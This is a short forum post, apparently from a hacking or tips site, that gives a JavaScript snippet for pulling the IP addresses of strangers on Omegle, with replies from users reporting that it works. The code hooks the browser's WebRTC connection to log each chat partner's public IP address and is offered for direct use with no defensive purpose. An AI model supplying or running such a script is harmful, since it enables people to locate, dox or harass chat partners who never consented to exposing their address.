How To Pull IP Address | Omegle IP Puller

Follow Video To Set Up:

Code:

window.oRTCPeerConnection  = window.oRTCPeerConnection || window.RTCPeerConnection

window.RTCPeerConnection = function(...args) {
 const pc = new window.oRTCPeerConnection(...args)

pc.oaddIceCandidate = pc.addIceCandidate

pc.addIceCandidate = function(iceCandidate, ...rest) {
 const fields = iceCandidate.candidate.split(' ')

if (fields[7] === 'srflx') {
console.log('IP Address:', fields[4])
}
return pc.oaddIceCandidate(iceCandidate, ...rest)

}

return pc
}

Credit To: EXCHANE

Happy learning!

7 Likes

working quite well . thanks man

1 Like

Hi ,I did but nothing happened. Can you pls tell what happens with this and how to use it.

.This came when I tried.

Wrong website brother you should try it on Omegle

1 Like

i got lot’s of IP